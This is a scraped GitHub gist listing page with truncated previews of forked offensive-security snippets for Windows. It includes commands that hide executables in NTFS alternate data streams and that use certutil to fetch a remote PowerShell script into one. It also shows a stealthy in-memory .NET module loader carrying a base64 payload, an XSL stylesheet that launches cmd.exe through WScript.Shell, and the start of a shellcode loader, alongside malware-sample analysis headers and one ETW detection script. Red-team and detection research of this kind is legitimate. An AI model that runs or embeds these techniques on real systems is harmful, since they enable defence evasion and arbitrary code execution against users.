Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
johnjohnsp1
johnjohnsp1
/ Exe_ADS_Methods.txt
Created
April 16, 2018 12:05
— forked from 0xabe-io/Exe_ADS_Methods.txt
Execute from Alternate Streams
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Add content to ADS | |
| type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
| extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
| findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
| certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
| makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
| print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
| reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
| regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey |
johnjohnsp1
/ detect-threadSuspendps1
Created
April 11, 2018 01:46
— forked from N3mes1s/detect-threadSuspendps1
Detect Process that open another process's thread with THREAD_SUSPEND_RESUME access right
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # mandatory https://github.com/zacbrown/PowerKrabsEtw for PowerKrabsEtw module | |
| import-module .\PowerKrabsEtw | |
| $trace = New-KrabsEtwUserTrace | |
| $provider = New-KrabsEtwUserProvider -ProviderName "Microsoft-Windows-Kernel-Audit-API-Calls" | |
| $filter = New-KrabsEtwCallbackFilter -EventId 6 | |
| Set-KrabsEtwCallbackFilter -UserProvider $provider -Filter $filter | |
| Set-KrabsEtwUserProvider -Trace $trace -Provider $provider | |
| Start-KrabsEtwUserTrace -Trace $trace | Where-Object { ($_.EtwProcessId -ne $_.TargetProcessId) -and ($_.DesiredAccess -bAnd 0x0002) } |
johnjohnsp1
/ LoadInMemoryModule.ps1
Created
April 3, 2018 18:08
— forked from mattifestation/LoadInMemoryModule.ps1
A stealthier method of loading a .NET PE in memory - via the Assembly.LoadModule method
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Domain = [AppDomain]::CurrentDomain | |
| $DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly') | |
| $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) | |
| $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule') | |
| # Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into. | |
| $ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll') | |
| $TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public) | |
| $TypeBuilder.CreateType() | |
| $HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Reflection; | |
| using System.Runtime.Hosting; | |
| public sealed class MyAppDomainManager : AppDomainManager | |
| { | |
| public override void InitializeNewDomain(AppDomainSetup appDomainInfo) | |
| { |
johnjohnsp1
/ f4816b95104356d08187c615e0dfb1bfd4c85a0d3f8a07a40c45d66693695058.txt
Created
March 27, 2018 16:15
— forked from JohnLaTwC/f4816b95104356d08187c615e0dfb1bfd4c85a0d3f8a07a40c45d66693695058.txt
VBA threat that uses Certutil and Task Scheduler
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## uploaded by @JohnLaTwC | |
| ## Sample hash: f4816b95104356d08187c615e0dfb1bfd4c85a0d3f8a07a40c45d66693695058 | |
| olevba 0.52dev7 - http://decalage.info/python/oletools | |
| Flags Filename | |
| ----------- ----------------------------------------------------------------- | |
| OpX:MASIHB-- f4816b95104356d08187c615e0dfb1bfd4c85a0d3f8a07a40c45d66693695058 | |
| =============================================================================== | |
| FILE: f4816b95104356d08187c615e0dfb1bfd4c85a0d3f8a07a40c45d66693695058 | |
| Type: OpenXML | |
| ------------------------------------------------------------------------------- |
johnjohnsp1
/ 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75.txt
Created
March 25, 2018 09:48
— forked from JohnLaTwC/8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75.txt
VBA / PS1 / Assembly 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## uploaded by @JohnLaTwC | |
| ## Sample hash: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75 | |
| olevba 0.52dev7 - http://decalage.info/python/oletools | |
| Flags Filename | |
| ----------- ----------------------------------------------------------------- | |
| OLE:MAS-HB-- 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75 | |
| =============================================================================== | |
| FILE: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75 | |
| Type: OLE | |
| ------------------------------------------------------------------------------- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| public class TestClass | |
| { | |
| public TestClass() | |
| {} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version='1.0'?> | |
| <stylesheet | |
| xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
| xmlns:user="placeholder" | |
| version="1.0"> | |
| <output method="text"/> | |
| <ms:script implements-prefix="user" language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); | |
| ]]> </ms:script> |
johnjohnsp1
/ web-servers.md
Created
March 9, 2018 08:10
— forked from willurd/web-servers.md
Big list of http static server one-liners
johnjohnsp1
/ Numerics.cs
Created
March 3, 2018 19:01
Shellcode Stuffed Into A System.Numerics.BigInteger - Cause You Know Why Not ;-)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee |